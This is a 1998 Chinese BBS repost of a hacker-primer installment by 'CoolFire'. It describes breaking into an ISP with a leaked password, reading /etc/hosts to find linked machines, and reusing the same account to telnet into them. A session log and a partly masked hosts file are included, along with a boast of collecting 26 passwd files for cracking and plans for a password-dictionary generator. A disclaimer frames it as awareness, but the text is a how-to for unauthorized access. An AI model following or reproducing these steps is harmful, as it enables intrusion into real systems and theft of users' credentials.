荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: white (白云飞), 信区: Hacker
标  题: (转摘)小心黑客(11)
发信站: 深大荔园晨风站 (Tue Jan  6 20:47:42 1998), 转信

Newsgroups: cn.bbs.comp.crack
Subject: 黑客入门(5)-纸老虎转贴

CoolHC Volume 4 By CoolFire Author E-Mail:
coolfire@cyberspace.org

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全

保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电
脑,
我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人
Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!


各位新年还愉快吗 ?? 有没有人过年还死守著电脑的呀~ 该出去活动活动罗~ 当然,
过完了年我们有有新的功课要作罗, 在过年前有一位网友 Mail 了一份 passwd 过
来,
我也因此找到了某家站台的密码, 经深入研究过之後, 决定产生这一篇文章, 大家先

身一下吧!! 等一下就会有好戏喔~

本次主题: 善用你所得到的任何资讯 (Exm: HOSTS 档)
连接位址: xxx.xxx.xxx.xxx (又马赛克啦)
特别说明: 因为该站台是一个 "很大" 的 网路提供者,
其服务地区遍及全亚, 所以必须要特别以马
赛克来处理, 希望网友们不要介意
(咱们重的是内容嘛!! 又不是.. 那个.. 那个).

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*


**** 课程开始 ****

首先说明的是, 这个网路提供者的服务项目, 包含了拨接及传真还有帮其它业者架设

路等, 也就是说如果我们能够善用他们的系统就可以免费传真罗 ?? 哇哩... 国际传

耶, 这间公司不就亏大了!!!!! 所以马赛克处理是必要的, 不过这次的课程不是说明

个 ISP 够大, 而是我们如何利用一组已经破解的密码来入侵其它与其相连的主机,

点是比较重要的!!

大家可能早就已经知道, 在 Unix 系统中 /etc 目录下的 hosts 档案的作用了, 我

今天就来谈谈, 知道的人跳过去吧!! 如果使用 Windoz 95 的人, 也可以看看在你
95
的系统目录中也有一个这样子的档案, 他是长得像这个样子的: 127.0.0.1
localhost
FETAG , 表示 127.0.0.1 为 LocalHost 也就是 FETAG 的电脑, 所以我们要找与该
Unix 有 "直接关系" 的主机可以由这个地方找到.

找到这些主机有甚么用呀 ?? 继然你已经有了一个主机的密码, 当然其它的主机也可

会有相同的 User 在其它的主机上用同样的帐号, 而且依据经验来说, 他们在其它主

上的密码通常都跟你目前所拥有的这一份是一样的, 也就是你可以用同样的一组密码

走於其它的主机!! 以下示范的这个例子就是啦!!

www:/etc$ telnet Superman.com.tw
Trying 222.111.111.111...
Connected to Superman.com.tw.
Escape character is '^]'.

Linux 1.2.8 (Superman.Superman.com.tw) (ttyp0)
(甚么烂公司, 新版系统的 Bug 少多了, 还不更新~~)

Superman login: amywang
Password:

(用你所知道的密码进入)

Linux 1.2.8. (POSIX).
You have new mail.

(不要偷看人家的信喔)

Superman:~$ cd /etc
Superman:/etc$ cat hosts

(直接深入今天的主题)

# For loopbacking.
127.0.0.1 localhost

222.111.247.1 router
222.111.247.2 abcdf01.tpfoo.Superman.com.tw abcdf01 f01
222.111.247.3 abcdf02.tpfoo.Superman.com.tw abcdf02 f02
222.111.247.4 abcdf03.tpfoo.Superman.com.tw abcdf03 f03
222.111.247.5 abcdf04.tpfoo.Superman.com.tw abcdf04 f04
207.121.0.15 abcdhk1.planet.com.hk abcdhk1 hk1
222.111.248.2 abcdf11.tcfoo.Superman.com.tw abcdf11 f11
222.111.248.3 abcdf12.tcfoo.Superman.com.tw abcdf12 f12
222.111.248.4 abcdf13.tcfoo.Superman.com.tw abcdf13 f13
222.111.248.131 abcdf21.ksfoo.Superman.com.tw abcdf21 f21
222.111.248.132 abcdf22.ksfoo.Superman.com.tw abcdf22 f22
222.111.248.133 abcdf23.ksfoo.Superman.com.tw abcdf23 f23
222.111.248.134 abcdf24.ksfoo.Superman.com.tw abcdf24 f24
222.111.247.33 abcdf01-s1.Superman.com.tw abcdf01-s1 f01-s1
222.111.247.33 abcdf02-s1.Superman.com.tw abcdf02-s1 f02-s1
222.111.247.34 abcdts2-s2.Superman.com.tw abcdts2-s1 ts2-s1
222.111.247.193 abcdf11-s1.Superman.com.tw abcdf11-s1 f11-s1
222.111.247.193 abcdf12-s1.Superman.com.tw abcdf12-s1 f12-s1
222.111.247.194 abcdts1-s1.Superman.com.tw abcdts1-s1 ts1-s1
222.111.247.73 abcdf21-s1.Superman.com.tw abcdf21-s1 f21-s1
222.111.247.197 abcdf22-s1.Superman.com.tw abcdf22-s1 f22-s1
222.111.247.198 abcdts1-s2.Superman.com.tw abcdts1-s2 ts1-s2
222.111.247.201 abcdus1-s1.Superman.com.tw abcdus1-s1 us1-s1
222.111.247.77 abcdus2-s1.Superman.com.tw abcdus2-s1 us2-s1
222.111.247.78 abcdts1-s3.Superman.com.tw abcdts1-s3 ts1-s3
222.111.247.133 abcdts1-l0.Superman.com.tw abcdts1-l0 ts1-l0
222.111.248.10 abcdts2-l0.Superman.com.tw abcdts2-l0 ts2-l0
#206.222.170.2 abcdus1.Superman.com.tw abcdus1 us1
#206.222.170.3 abcdus2.Superman.com.tw abcdus2 us2
206.222.170.4 abcdus3.Superman.com.tw abcdus3 us3
206.222.170.5 abcdus4.Superman.com.tw abcdus4 us4
206.222.170.7 abcdus1+.Superman.com.tw abcdus1+ us1+ us1
206.222.170.6 abcdus2+.Superman.com.tw abcdus2+ us2+ us2
222.111.247.131 linux01.Superman.com.tw linux01 x01
222.111.247.135 linux03.Superman.com.tw linux03
222.111.247.151 linux04.Superman.com.tw linux04 x04
222.111.247.132 linux02-l0.Superman.com.tw linux02 x02
222.111.111.111 Superman.Superman.com.tw Superman
222.111.27.153 pc3.Superman.com.tw abcdpc3 pc3
222.111.27.152 pc2.Superman.com.tw abcdpc2 pc2
222.111.27.147 brian.Superman.com.tw brian brian
222.111.27.148 linuxpc.Superman.com.tw linuxpc hsliao
220.65.11.1 knet01
203.127.230.243 fooServer.warpdrive.com.sg sgp02
# End of hosts

(我已经尽量在马赛克了!! 如果有没有马赛克完全的地方, 请该网路业者见谅)
(因为是 Telnet LogFile 直接收录的嘛~ 唉.. 谁叫你的系统这么脆弱~)

Superman:/etc$ telnet 220.65.11.1
Trying 210.65.33.2...
Connected to 210.65.33.2.
Escape character is '^]'.

Linux 1.2.8 (snet01) (ttyp2)


knet01 login: amywang
Password:

Linux 1.2.8. (KNET01).
You have new mail.

(进来了! 就是这样啦!!!!!!)

用了这种方法对该主机所连接的各点作测试, 找到了一个可以使用所有主机的帐号及

码档案, 我用这个帐号抓了 26 台主机的 /etc/passwd, 现在我的机器还在使用
CJack
对这 26 个密码档解码中, 如果有更进一步的消息, 我们会在下一篇的时候一并讨
论,
当然这个方法不仅适用於这间公司, 对其它的主机也都适用, 这间公司的规模应算不

了, 台湾; 香港; 日本都有分公司的样子, 不过也都.... 呵

以上就是 hosts 档的妙用了!! 可能在此篇发表之後大家都用 DNS 了, 而不再编辑
hosts
档了~~ 不过这个档案也可以锁起来呀~ 限定只有 root 可以用嘛! 反正一些烂 ISP
不是都这样, 一有安全顾虑就限定使用者的使用... 老套了啦!! 你还是会有其它的
漏洞
的... Linux 1.2.8 哈哈~~ 多的是漏洞哩!!!!就算你把 hosts 也锁起来, passwd

shadow.. 还是有一大堆的地方是欢迎大家进入的~~

嗯.. 没有挑衅的意思啦~ 各位亲爱的网路提供者... 请将您的系统加锁, 以免有任

不测. 上次我们说的那个 ISP (WWW Server 有漏洞的那个), 这次已经将 root 的密

改掉了, 但是还是留下许多 User 的密码没有改, Password 档也没有作任何的保护,

於这样的业者, 哪一家公司的 Home Page 敢放在上面呢 ?? 被人乱改一通不是破坏?
斯?
司的形像吗 ??

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*


**** 又是字典档 ****

这次字典档的部份不再多谈了, 讲讲上一次的一点漏失, 由於上次写出来的程式太多

方没有先作考虑, 所以用起来怪怪的 !! 再加上很多的功能没有加上的关系, 有很多

友反映出来的问题多在自己操作上的错误, 呵~ 怪写程式的人没有作好一些检查的动

作嘛~

所以 CoolFire 决定将上次那个鸟程式重新写过, 配合排序及检查重覆的功能来使
用,
预计由今天晚上开始动工写出字典档的产生器, 这样才对各位网友们有个交待, 喝
呵...
不过网友们别抱著太大的希望, 因为 James 的 LetMeIn! 2.0 也还在大家的期盼下
久久
未见, 每天加班的他也实在没甚么时间, CoolFire 能在甚么时候写好, 也是未知数.

不过请各位 Mail 给我你对此字典档产生器的意见, 还有你希望它能在甚么作业系统

动作 ?? DOS ?? Windoz ??

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*


**** 首页更新通知 ****

上一次的通知有点早, 因为只改了小部份, 日後将不对小部份的更动作任何的通知,

对大更动通知, 不过还是请各位有空的时候上来多看看, 以免你在努力的时候别人已

看过了所有的 Hole List 也将漏洞补上了! 努力是会有成果的!!

CoolFire 想在板上放个 Crack 心得留言板 ! 有没有人有意见的 ??? 留信给我

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

--
※ 来源:.深大荔园晨风站 bbs.szu.edu.cn.[FROM: 202.192.140.204]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店